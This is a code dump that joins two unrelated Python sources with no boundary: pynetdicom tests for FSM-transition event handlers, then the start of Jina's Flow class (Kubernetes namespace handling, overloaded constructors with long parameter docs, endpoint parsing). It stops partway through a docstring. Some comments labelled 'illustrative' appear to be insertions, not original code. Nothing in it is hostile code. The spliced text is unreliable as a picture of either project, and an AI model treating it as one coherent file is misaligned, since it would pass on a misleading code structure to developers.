ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert assoc.is_established
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:5] == ['Sta1', 'Sta4', 'Sta5', 'Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_bind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.bind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:2] == ['Sta6', 'Sta7']
scp.shutdown()
def test_transition_requestor_unbind(self):
"""Test EVT_FSM_TRANSITION as requestor."""
triggered = []
def handle(event):
triggered.append(event)
self.ae = ae = AE()
ae.add_supported_context('1.2.840.10008.1.1')
ae.add_requested_context('1.2.840.10008.1.1')
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False)
assoc = ae.associate('localhost', 11112, evt_handlers=handlers)
assert assoc.is_established
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == [(handle, None)]
assoc.unbind(evt.EVT_FSM_TRANSITION, handle)
assert assoc.get_handlers(evt.EVT_FSM_TRANSITION) == []
assert scp.get_handlers(evt.EVT_FSM_TRANSITION) == []
child = scp.active_associations[0]
assert child.get_handlers(evt.EVT_FSM_TRANSITION) == []
assoc.release()
timeout = 0
while not assoc.is_released and timeout < 10:
time.sleep(0.05)
timeout += 0.05
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta4', 'Sta5']
scp.shutdown()
def test_transition_raises(self, caplog):
"""Test the handler for EVT_FSM_TRANSITION raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.add_requested_context(VerificationSOPClass)
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assoc.release()
timeout = 0
while scp.active_associations and timeout < 10:
time.sleep(0.05)
timeout += 0.05
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
"handler 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
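# Hedged, illustrative sketch (not part of the original test suite): the event
# handling tests above show that a handler bound to ``evt.EVT_FSM_TRANSITION``
# receives the current state, FSM event, action and next state of every
# transition. Run as a script, the same pattern traces a simple associate/release
# cycle; the port and Verification SOP Class UID are the values used in the tests.
if __name__ == '__main__':
    def handle(event):
        # Each event exposes the names used by the DICOM Upper Layer FSM
        print(event.current_state, event.fsm_event, event.action, event.next_state)

    ae = AE()
    ae.add_supported_context('1.2.840.10008.1.1')
    ae.add_requested_context('1.2.840.10008.1.1')
    scp = ae.start_server(('', 11112), block=False)
    assoc = ae.associate(
        'localhost', 11112, evt_handlers=[(evt.EVT_FSM_TRANSITION, handle)]
    )
    if assoc.is_established:
        assoc.release()
    scp.shutdown()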
base.py
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import Optional, Union, Tuple, List, Set, Dict, overload, Type
from .builder import allowed_levels, _hanging_pods
from .. import __default_host__
from ..clients import Client
from ..clients.mixin import AsyncPostMixin, PostMixin
from ..enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
InfrastructureType,
PollingType,
)
from ..excepts import (
FlowTopologyError,
FlowMissingPodError,
RoutingTableCyclicError,
RuntimeFailToStart,
)
from ..helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from ..jaml import JAMLCompatible
from ..logging.logger import JinaLogger
from ..parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from ..parsers.flow import set_flow_parser
from ..peapods import CompoundPod, Pod
from ..peapods.pods.k8s import K8sPod
from ..peapods.pods.factory import PodFactory
from ..types.routing.table import RoutingTable
from ..peapods.networking import is_remote_local_connection
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if False:
from ..executors import BaseExecutor
from ..clients.base import BaseClient
from .asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
class _FlowK8sInfraResourcesManager:
def __init__(self, k8s_namespace: str, k8s_custom_resource_dir: Optional[str]):
self.k8s_namespace = k8s_namespace
self.k8s_custom_resource_dir = k8s_custom_resource_dir
self.namespace_created = False
def __enter__(self):
from ..peapods.pods.k8slib import kubernetes_tools, kubernetes_client
client = kubernetes_client.K8sClients().core_v1
list_namespaces = [
item.metadata.name for item in client.list_namespace().items
]
if self.k8s_namespace not in list_namespaces:
with JinaLogger(f'create_{self.k8s_namespace}') as logger:
logger.info(f'🏝️\tCreate Namespace "{self.k8s_namespace}"')
kubernetes_tools.create(
'namespace',
{'name': self.k8s_namespace},
logger=logger,
custom_resource_dir=self.k8s_custom_resource_dir,
)
self.namespace_created = True
def __exit__(self, exc_type, exc_val, exc_tb):
from ..peapods.pods.k8slib import kubernetes_client
if self.namespace_created:
client = kubernetes_client.K8sClients().core_v1
client.delete_namespace(name=self.k8s_namespace)
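# Illustrative note (not in the original source): the nested manager above only
# creates the namespace on __enter__ when it does not already exist, and only
# deletes it on __exit__ when it created it itself, e.g. (hypothetical usage):
#
#     with Flow._FlowK8sInfraResourcesManager('my-ns', None):
#         ...  # resources deployed into "my-ns" are cleaned up on exit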
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. Otherwise, these proxy variables are unset before starting. gRPC seems to prefer no proxy.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
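# Hedged, illustrative example of the client-level arguments documented above
# (values are placeholders, not defaults):
#
#     f = Flow(host='0.0.0.0', port=12345, protocol='HTTP')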
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
cors: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = True,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
port_ctrl: Optional[int] = None,
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
port_out: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCRuntime',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_CONNECT',
socket_out: Optional[str] = 'PUSH_CONNECT',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `--compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to True basically tells the Pea not to wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatic docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows access within the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the successful execution in the sequel flow. If something
goes wrong upstream, it is hard to carry this exception forward without any side effects.
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_out: The port for output data, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. Otherwise, these proxy variables are unset before starting. gRPC seems to prefer no proxy.
:param py_modules: The customized Python modules that need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that runs in a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key to be used in ssh login, default None. Regular default ssh keys will be used without specifying this argument.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external Pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatic docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When used under Python, the following values are additionally accepted:
- a Python dict that represents the config
- a text file stream that has a `.read()` interface
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of keyword arguments that will be passed to the Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:param zmq_identity: The identity of a ZMQRuntime. It is used for unique socket identification towards other ZMQRuntimes.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
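# Hedged, illustrative example of the gateway-level arguments documented above
# (values are placeholders):
#
#     f = Flow(protocol='HTTP', port_expose=12345, cors=True, title='demo gateway')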
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
static_routing_table: Optional[bool] = False,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external Pods
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
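# Hedged, illustrative example of the Flow-level arguments documented above
# (values are placeholders):
#
#     f = Flow(name='toy', workspace='./ws', inspect='REMOVE')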
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1'  #: YAML version number; this will be overridden later if the YAML config says otherwise
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
]  #: the default first Pod is the gateway; it will be added when build() is called
self._update_args(args, **kwargs)
self.k8s_infrastructure_manager = None
if self.args.infrastructure == InfrastructureType.K8S:
self.k8s_infrastructure_manager = self._FlowK8sInfraResourcesManager(
k8s_namespace=self.args.name,
k8s_custom_resource_dir=getattr(
self.args, 'k8s_custom_resource_dir', None
),
)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from ..parsers.flow import set_flow_parser
from ..helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that cannot be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from .asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parse the endpoint(s) in `needs` into a set of Pod names
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the input/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
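# Illustrative note (not in the original source): a str endpoint becomes a
# one-element set, an empty endpoint falls back to ``op_flow.last_pod`` when
# ``connect_to_last_pod`` is True, and inspected Pods are substituted via
# ``_inspect_pods``. Hypothetical example, assuming no inspect Pods:
#
#     Flow._parse_endpoints(flow, 'encoder', 'gateway')   # -> {'gateway'}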
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(self, needs, **kwargs):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise the ctrl port could conflict
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
k8s_namespace=self.args.name,
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.k8s_namespace = self.args.name
args.connect_to_predecessor = False
args.noblock_on_start = True
self._pod_nodes[GATEWAY_NAME] = PodFactory.build_pod(
args, needs, self.args.infrastructure
)
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow; wait until all Peas defined in **needs** have completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
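# Hedged usage sketch for ``needs`` (Pod names are illustrative); see also
# ``needs_all`` below:
#
#     f = Flow().add(name='p1').add(name='p2', needs='gateway').needs(['p1', 'p2'])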
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all hanging Peas have completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
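# Hedged usage sketch for ``needs_all`` (same illustrative topology, letting the
# Flow collect the hanging Pods itself):
#
#     f = Flow().add(name='p1').add(name='p2', needs='gateway').needs_all()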
# overload_inject_start_pod
@overload
def add(
self,
*,
connect_to_predecessor: Optional[bool] = False,
ctrl_with_ipc: Optional[bool] = False,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
host_out: Optional[str] = '0.0.0.0',
hosts_in_connect: Optional[List[str]] = None,
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
memory_hwm: Optional[int] = -1,
name: Optional[str] = None,
native: Optional[bool] = False,
on_error_strategy: Optional[str] = 'IGNORE',
peas_hosts: Optional[List[str]] = None,
polling: Optional[str] = 'ANY',
port_ctrl: Optional[int] = None,
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
port_out: Optional[int] = None,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runs_in_docker: Optional[bool] = False,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'ZEDRuntime',
scheduling: Optional[str] = 'LOAD_BALANCE',
shards: Optional[int] = 1,
socket_in: Optional[str] = 'PULL_BIND',
socket_out: Optional[str] = 'PUSH_BIND',
ssh_keyfile: Optional[str] = None,
ssh_password: Optional[str] = None,
ssh_server: Optional[str] = None,
static_routing_table: Optional[bool] = False,
timeout_ctrl: Optional[int] = 5000,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
zmq_identity: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connect_to_predecessor: The head Pea of this Pod will connect to the TailPea of the predecessor Pod.
:param ctrl_with_ipc: If set, use ipc protocol for control socket
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to True basically tells the Pea not to wait on the Runtime when closing
:param docker_kwargs: Dictionary of keyword arguments that will be passed to the Docker SDK when starting the docker
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in the Docker image. When not set, the Docker image ENTRYPOINT takes effect.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposes the private IP address, which only allows access within the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow. This Pod will not be context-managed by the Flow.
:param force: If set, always pull the latest Hub Executor bundle even if it exists locally
:param gpus: This argument allows a dockerized Jina Executor to discover local GPU devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display`
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for input, by default it is 0.0.0.0
:param host_out: The host address for output, by default it is 0.0.0.0
:param hosts_in_connect: The host address for input, by default it is 0.0.0.0
:param install_requirements: If set, install the `requirements.txt` of the Hub Executor bundle locally
:param log_config: The YAML config of the logger used in this object.
:param memory_hwm: The memory high watermark of this pod in Gigabytes, pod will restart when this is reached. -1 means no restriction
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors are allowed, and the Executor is always run inside ZEDRuntime.
:param on_error_strategy: The skip strategy on exceptions.
- IGNORE: Ignore it, keep running all Executors in the sequel flow
- SKIP_HANDLE: Skip all Executors in the sequel, only `pre_hook` and `post_hook` are called
- THROW_EARLY: Immediately throw the exception, the sequel flow will not be running at all
Note, `IGNORE`, `SKIP_EXECUTOR` and `SKIP_HANDLE` do not guarantee the successful execution in the sequel flow. If something
goes wrong upstream, it is hard to carry this exception forward without any side effects.
:param peas_hosts: The hosts of the Peas when shards is greater than 1.
Peas will be evenly distributed among the hosts. By default,
Peas run on the host provided by the argument ``host``
:param polling: The polling strategy of the Pod (when `shards>1`)
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
:param port_ctrl: The port for controlling the runtime, default a random port between [49152, 65535]
:param port_in: The port for input data, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param port_out: The port for output data, default a random port between [49152, 65535]
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules that need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary
:param runs_in_docker: Informs a Pea that it runs inside a container. Important to properly set networking information
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param scheduling: The strategy of scheduling workload among Peas
:param shards: The number of shards in the pod running at the same time, `port_in` and `port_out` will be set to random, and routers will be added automatically when necessary. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param socket_in: The socket type for input port
:param socket_out: The socket type for output port
:param ssh_keyfile: This specifies a key file to be used for ssh login, default None. Regular default ssh keys will be used when this argument is not given.
:param ssh_password: The ssh password to the ssh server.
:param ssh_server: The SSH server through which the tunnel will be created, can actually be a fully specified `user@server:port` ssh url.
:param static_routing_table: Defines if the routing table should be pre-computed by the Flow. In this case it is statically defined for each Pod and not sent on every data request. Cannot be used in combination with external pods
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only a flat structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
